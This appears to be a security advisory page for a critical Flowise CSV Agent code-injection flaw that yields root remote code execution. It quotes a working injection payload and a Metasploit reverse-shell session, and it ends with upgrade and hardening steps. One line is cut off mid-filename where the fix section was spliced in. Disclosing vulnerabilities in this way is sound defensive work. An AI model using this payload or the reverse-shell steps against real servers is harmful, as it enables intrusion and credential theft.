CVE-2026-69255critical
CVE-2026-69255: Flowise Fixes Critical Root RCE Vulnerability
A critical remote code execution vulnerability in Flowise allows low-privileged attackers to gain root access on vulnerable servers via CSV Agent code injection.
Vendor / Productnpm/flowise, npm/flowise-components
Affected Versionsnpm/flowise prior to 3.1.3, npm/flowise-components prior to 3.1.3
Fixed In3.1.3
Advertisement
What This Means
Advisory ID: GHSA-vmv7-4m6c-3cg5 (CVE-2026-69255)
Summary: Flowise: CSV Agent Remote Code Execution via Pyodide Code Injection — Root Shell Verified
Severity: critical
Affected packages: npm/flowise (patched in 3.1.3), npm/flowise-components (patched in 3.1.3)
Details: ## UPDATE 2026-05-20: Full RCE as root VERIFIED
**This is not theoretical — a Meterpreter reverse shell session as root has been established on Flowise 3.1.2.**
### Verified Exploit Chain
1. Python code injection via `base64_string = "${base64String}"` (CSVAgent.ts line 161)
2. Pyodide `js` bridge provides access to the host Node.js process
3. `process.mainModule.constructor._load('child_process')` loads child_process (bypasses ESM require restriction)
4. `.execSync('CMD')` executes arbitrary OS commands as **root** (PID 1 in container)
### Working RCE Payload
```
";import js;e=js.globalThis.eval;e("process.mainModule.constructor._load('child_process').execSync('id')");#
```
**Constraint:** No commas allowed in payload — `csvFile.split(',')` splits on all commas.
### Metasploit Session Proof
```
msf > use exploit/multi/http/flowise_csv_agent_rce
msf > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
msf > exploit
[+] Authentication successful
[+] Created chatflow: b6716feb-63c8-4fd2-993f-cd43788704b4
[*] Sending stage (3090404 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:41422)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : cbce3fb352b7
OS : Linux 6.8.0-111-generic
Architecture : x64
Meterpreter : x64/linux
meterpreter > shell
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
# uname -a
Linux cbce3fb352b7 6.8.0-111-generic x86_64 Linux
```
### Additional Verified Impact
**Credential Theft:**
```
FLOWISE_PASSWORD=admin123
DATABASE_PATH=/root/.flowise
APIKEY_PATH=...
```
**Arbitrary File Read** via `process.binding('fs').readFileUtf8('/etc/hostname')` → `cbce3fb352b7`
**Server DoS** — certain native binding calls (spawn_sync) crash the Node.js process entirely.
### CVSS v3.1: 9.9 CRITICAL
`AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H`
---
## Original Report (below)
## Vulnerable Code
**File:** `packages/components/nodes/agents/CSVAgent/CSVAgHow to Fix It
- Upgrade npm/flowise and npm/flowise-components to version 3.1.3 or later
- Reconfigure container deployments to run the Flowise process as a non-root user
- Restrict public network access to the Flowise management interface
- Rotate stored API keys, passwords, and database credentials configured within Flowise
Source
Last updated August 5, 2026 UTC